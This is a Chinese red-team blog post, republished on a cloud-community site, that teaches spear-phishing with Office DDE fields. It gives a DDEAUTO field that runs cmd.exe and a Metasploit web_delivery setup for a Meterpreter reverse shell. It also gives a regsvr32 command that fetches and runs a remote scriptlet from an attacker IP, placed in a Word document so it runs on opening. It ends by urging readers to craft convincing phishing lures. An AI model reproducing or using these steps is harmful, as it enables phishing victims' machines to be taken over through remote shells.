学习
实践
活动
专区
工具
TVP
写文章
专栏首页漏洞知识库鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

渗透攻击红队

一个专注于红队攻击的公众号

大家好,这里是 渗透攻击红队 的第 54 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新

DDE

DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。

通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。

在MSWord和MSExcel里,我们可以使用DDE来执行命令。

DDE 攻击演示

DDE 攻击打开 calc

首先通过 word 文档设置一个域代码:crlt+f9,或者选中“插入”-“文件部件”-“”,选中第一个 = (Formula) 然后右键切换域代码来编辑代码,插入下面的内容:

然后再里面输入测试代码:

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

保存后重新打开 word 文档:

点击两次“是”就会调用 DDE 执行 calc.exe:

Metasploit + DDE = Meterpreter

那如果是要反弹 shell 的话需要借助 MSF 来帮助我们:

msf > use exploit/multi/script/web_delivery
msf > set target 3
msf > set payload windows/meterpreter/reverse_tcp_uuid 
msf > set lhost 192.168.201.237
msf > set lport 8081
msf exploit(multi/script/web_delivery) > exploit -j 
[*] Exploit running as background job 0.

得到的反弹代码是:

regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll

然后我们在 DDE 里插入代码(注意引号):

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll"

最后保存再打开 word 文档即可反弹 shell 到 msf :

结尾

DDE 攻击比较老了,不过在渗透中难免还是会碰到;关于 DDE 攻击的缺点就在于目标必须要点击两次“是”才能够执行 DDE 代码进行攻击,而至于怎样才能让目标心甘情愿的点击,那就靠各位如何包装钓鱼邮件,和如何实施了,一份逼真的钓鱼鱼饵在于你搜集到目标的信息是否准确真实,在此不多解释大家都懂。

文章分享自微信公众号:
渗透攻击红队

本文参与 腾讯云自媒体分享计划 ,欢迎热爱写作的你一起参与!

作者:渗透攻击红队
原始发表时间:2021-04-20
如有侵权,请联系 cloudcommunity@tencent.com 删除。
登录 后参与评论
0 条评论

相关文章

  • 利用PowerShell Empire实现Word文档DDE攻击控制

    ? 近期,有安全人员发现了一种DynamicData Exchange (DDE)协议绕过MSWord和MSExcel宏限制,不需使用MSWord和MSExc...

    FB客服
  • 干货 | Office文档钓鱼之如何快速进行宏免杀

    Office 宏,译自英文单词 Macro。宏是 Office 自带的一种高级脚本特性,通过 VBA 代码, 可以在 Office 中去完成某项特定的任务,而不...

    HACK学习
  • 无需开启宏即可渗透:在Office文档中利用DDE执行命令

    概述 最近,国外的安全研究员发现了一种在文档中使用DynamicData Exchange (DDE)协议发起渗透的方法。使用该方法可以绕过MSWord和MSE...

    FB客服
  • 利用微信0day漏洞进行钓鱼攻击防范

    1.攻击者利用微信(PC版)0day构造恶意的钓鱼链接,通过微信将钓鱼链接发送给目标员工。

    HACK学习
  • Excel 旧用户正成为恶意软件的目标

    根据安全专家的最新发现,Microsoft Excel的旧用户正成为恶意软件的攻击目标。这种恶意软件攻击活动使用了一种新的恶意软件混淆技术来禁用Microsof...

    FB客服
  • DarkHydrus使用Phishery在中东地区窃取凭证

    在上周,Unit 42发表了一个篇关于介绍一个名为DarkHydrus的新威胁组织的博文,我们观察到该组织的目标是位于中东地区的政府实体。在这篇文章中,我们对通...

    FB客服
  • Red Team 工具集之攻击武器库

    上图是一个 Red Team 攻击的生命周期,整个生命周期包括:信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上...

    信安之路
  • 干货 | 红队和漏洞挖掘中那些关于”文档“的妙用(上)

    为什么会有这篇文章,其实是一个非常有意思的事情。在安全领域,有非常多涉及Word、Execl、PDF、CHM、PPT等等文档的攻击手法,从Web领域到红队领域,...

    HACK学习
  • 关于钓鱼邮件那些事

    •近几年,社会工程学攻击已经成为IT部门关注的重点,2021年网络犯罪造成的破坏将让全球每年损失6万亿美元;

    betasec
  • 美国政府再次指责俄罗斯黑客攻击其关键基础设施

    Cylance的研究员报道称网络攻击者在利用一个核心路由器针对一些基础设施进行攻击,美国指责这一攻击的实施者为俄罗斯。主要针对能源、核、商业设施、水、建筑、航空...

    FB客服
  • “商贸信”病毒重新活跃 四天狂发20万钓鱼邮件

    12月上旬在全球范围大范围爆发的“商贸信”病毒近日再度复苏。根据腾讯安全御见情报中心检测发现,自12月11日起,“商贸信”病毒开始重新活跃,并在国内地区呈现爆发...

    企鹅号小编
  • APT攻击盘点及实战(上)

    我相信很多人在发文章的时候,都写了关于APT攻击相关的文章!在这里我也发一篇该文章!哈!但是我比较喜欢实战,不太喜欢理论上的东西。相信大家也跟我一样喜欢实战,恰...

    糖果
  • 近年APT组织常用的攻击漏洞

    APT攻击(Advanced Persistent Threat,高级持续性威胁)是利用当下先进的攻击手法对特定目标进行长期持续性的网络攻击。APT攻击的高级体...

    HACK学习
  • APT案例分析 | Lazarus利用ThreatNeedle攻击某工业

    Lazarus Group[1]是一个源于朝鲜政府的威胁组织,由于其发起攻击的性质及其攻击行动中使用的各种攻击手法,现已被指定为高级持续性威胁。Lazarus ...

    betasec
  • 干货 | Office文档钓鱼的实战和免杀技巧

    原文链接:https://mp.weixin.qq.com/s/OdCrUOsVAscqOjWaq2w8hQ

    HACK学习
  • 2017年Office漏洞及漏洞攻击研究报告

    昨天50还没用完
  • 凭据收集攻击的目标是视频会议应用程序(Internet)

    Zoom和其他视频会议工具的用户应该意识到冒名顶替攻击的风险不断增加。现在,即使使用其他视频平台在社交级别与朋友保持联系也构成更高的安全风险。

    用户8054058

扫码关注腾讯云开发者

领取腾讯云代金券